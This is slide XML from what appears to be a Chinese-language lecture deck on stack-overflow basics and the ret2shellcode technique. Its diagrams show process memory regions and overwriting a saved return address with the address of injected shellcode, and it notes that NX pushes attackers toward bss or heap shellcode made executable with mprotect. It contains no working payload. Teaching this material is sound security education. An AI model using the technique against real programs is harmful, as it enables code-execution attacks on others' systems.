                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A8DC2CD-6D8B-473D-BD39-E56AFEDCFDC5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4584869" y="992499"/>
              <a:ext cx="5738977" cy="5069724"/>
              <a:chOff x="4897548" y="888136"/>
              <a:chExt cx="1363202" cy="3276746"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Shape 625">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{529DE509-C2E4-44BB-8BE6-C481AF3FA52E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="888136"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="666666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rgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>For Kernel</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Shape 626">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F13D3A9-59E1-48B7-B88F-AFA6E52583E9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1162336"/>
                <a:ext cx="1363200" cy="532702"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFF2CC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" name="Shape 627">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9D023FC-2D0D-4160-AE9D-3A16DB1F7623}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1695037"/>
                <a:ext cx="1363200" cy="345399"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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" name="Shape 628">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EC5BF3E-1C26-460D-BF4F-9870124E7288}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2040436"/>
                <a:ext cx="1363200" cy="442800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shared libraries</a:t>
                </a:r>
                <a:endParaRPr/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="Shape 629">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F78A3CD3-E481-4F8E-BA23-04776A31C3E4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2483236"/>
                <a:ext cx="1363200" cy="410861"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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Shape 630">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3C36562-15E1-44F3-A275-54744B61749F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2891581"/>
                <a:ext cx="1363200" cy="276712"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="D9EAD3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dirty="0"/>
                  <a:t>Heap</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Shape 631">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6286BDDF-878B-4830-8C97-41E0EAD0356C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897548" y="3338736"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="F4CCCC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Data</a:t>
                </a:r>
                <a:endParaRPr/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Shape 632">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9282ED0-348A-430C-9614-46B78381CB83}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3613971"/>
                <a:ext cx="1363200" cy="276712"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFF2CC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dirty="0"/>
                  <a:t>Text</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14" name="Shape 633">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D40C47C8-3847-4696-ACE1-0EAF89E09DA4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3890682"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="666666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rgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Unused</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="15" name="Shape 634">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FDAEC4A-0225-4A8A-BE4B-B55D902BD42D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="8" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5579150" y="1695037"/>
                <a:ext cx="0" cy="109299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16" name="Shape 635">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B83DCF5A-918C-4F83-A5BF-9C91701057AB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="11" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="5579150" y="2559899"/>
                <a:ext cx="4460" cy="331682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</p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Shape 631">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E991AC80-276A-4219-AB15-7858AE929F7C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4584879" y="1844876"/>
              <a:ext cx="5738969" cy="251142"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E4808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zh-CN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ret_addr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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= </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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shellcode_addr</a:t>
              </a:r>
              <a:endParaRPr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17" name="文本框 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{687AF02C-0789-432C-A9DB-7FED09A1EB89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10804511" y="1220595"/>
            <a:ext cx="858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Stack</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="连接符: 肘形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22E0522E-454E-4538-B2E5-F09C06D10F87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="6572996" y="1502416"/>
            <a:ext cx="380913" cy="4"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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hape 628">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{402A0AF2-2DF5-4833-A710-9AE68DA39E2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6763450" y="4536254"/>
            <a:ext cx="3883021" cy="28794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 err="1"/>
              <a:t>Bss</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B214794-FBBA-4945-A292-0508CF388B3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6763450" y="1171934"/>
            <a:ext cx="3883021" cy="280050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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shellcode we input</a:t>
            </a:r>
            <a:endParaRPr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E46CE33E-2848-4445-9B59-658F83F77458}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1215442" y="1995953"/>
            <a:ext cx="361074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篡改栈帧上的返回地址为攻击者手动传入的 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shellcode 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所在缓冲区地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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初期往往将 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shellcode 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直接写入栈缓冲区</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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目前由于 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the NX bits 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保护措施的开启，栈缓冲区不可执行，故当下的常用手段变为向 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF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bss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缓冲区写入 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shellcode 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或向堆缓冲区写入 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shellcode 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并使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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mprotect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赋予其可执行权限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3C3D8B2A-4D70-4133-8B65-0320F68FEBFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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栈溢出基础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| ret2shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="377352319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6F542C06-4F84-45F8-A155-C9C1CA996953}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6631568" y="305873"/>
            <a:ext cx="3883024" cy="6246254"/>
            <a:chOff x="4584874" y="992499"/>
            <a:chExt cx="5738974" cy="5601480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="4" name="Shape 624">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A8DC2CD-6D8B-473D-BD39-E56AFEDCFDC5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4584874" y="992499"/>
              <a:ext cx="5738973" cy="5601480"/>
              <a:chOff x="4897549" y="888136"/>
              <a:chExt cx="1363201" cy="3620439"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Shape 625">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{529DE509-C2E4-44BB-8BE6-C481AF3FA52E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="888136"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="666666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rgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>For Kernel</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Shape 626">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F13D3A9-59E1-48B7-B88F-AFA6E52583E9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1162336"/>
                <a:ext cx="1363200" cy="532702"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFF2CC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" name="Shape 627">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9D023FC-2D0D-4160-AE9D-3A16DB1F7623}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1695037"/>
                <a:ext cx="1363200" cy="345399"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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" name="Shape 628">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EC5BF3E-1C26-460D-BF4F-9870124E7288}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2040436"/>
                <a:ext cx="1363200" cy="442800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shared libraries</a:t>
                </a:r>
                <a:endParaRPr/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="Shape 629">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F78A3CD3-E481-4F8E-BA23-04776A31C3E4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2483236"/>
                <a:ext cx="1363200" cy="410861"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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Shape 630">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3C36562-15E1-44F3-A275-54744B61749F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2894098"/>
                <a:ext cx="1363200" cy="274195"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="D9EAD3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dirty="0"/>
                  <a:t>Heap</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Shape 631">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6286BDDF-878B-4830-8C97-41E0EAD0356C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897549" y="3681759"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="F4CCCC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dirty="0"/>
                  <a:t>Data</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Shape 632">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9282ED0-348A-430C-9614-46B78381CB83}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3957664"/>
                <a:ext cx="1363200" cy="276712"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFF2CC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dirty="0"/>
                  <a:t>Text</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14" name="Shape 633">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D40C47C8-3847-4696-ACE1-0EAF89E09DA4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="4234375"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="666666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rgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Unused</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="15" name="Shape 634">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FDAEC4A-0225-4A8A-BE4B-B55D902BD42D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="8" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5579150" y="1695037"/>
                <a:ext cx="0" cy="109299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16" name="Shape 635">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B83DCF5A-918C-4F83-A5BF-9C91701057AB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="11" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="5579150" y="2559899"/>
                <a:ext cx="4460" cy="334199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</p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Shape 631">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E991AC80-276A-4219-AB15-7858AE929F7C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4584879" y="1844876"/>
              <a:ext cx="5738969" cy="251142"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E4808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zh-CN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ret_addr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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= </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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shellcode_addr</a:t>
              </a:r>
              <a:endParaRPr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17" name="文本框 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{687AF02C-0789-432C-A9DB-7FED09A1EB89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10672628" y="924113"/>
            <a:ext cx="858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Stack</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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9A27E8BD-EE3F-4447-9D68-66DAEB5233CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10760237" y="4556015"/>
            <a:ext cx="683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Bss</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="连接符: 肘形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22E0522E-454E-4538-B2E5-F09C06D10F87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="1"/>
            <a:endCxn id="21" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="6631567" y="1396390"/>
            <a:ext cx="4" cy="3388932"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 5715100000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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hape 628">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{402A0AF2-2DF5-4833-A710-9AE68DA39E2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631570" y="4241794"/>
            <a:ext cx="3883021" cy="88090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" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B214794-FBBA-4945-A292-0508CF388B3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631567" y="4645297"/>
            <a:ext cx="3883021" cy="280050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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shellcode we input</a:t>
            </a:r>
            <a:endParaRPr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5D428442-E10F-4CA8-8CF0-A41520AFB679}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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栈溢出基础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| ret2shellcode</a:t>
            </a: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973F756A-7B77-2113-0AEA-B777E08CEB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692" y="1266439"/>
            <a:ext cx="4465707" cy="1867062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95F68219-183F-663C-82BF-29C8FE80526B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
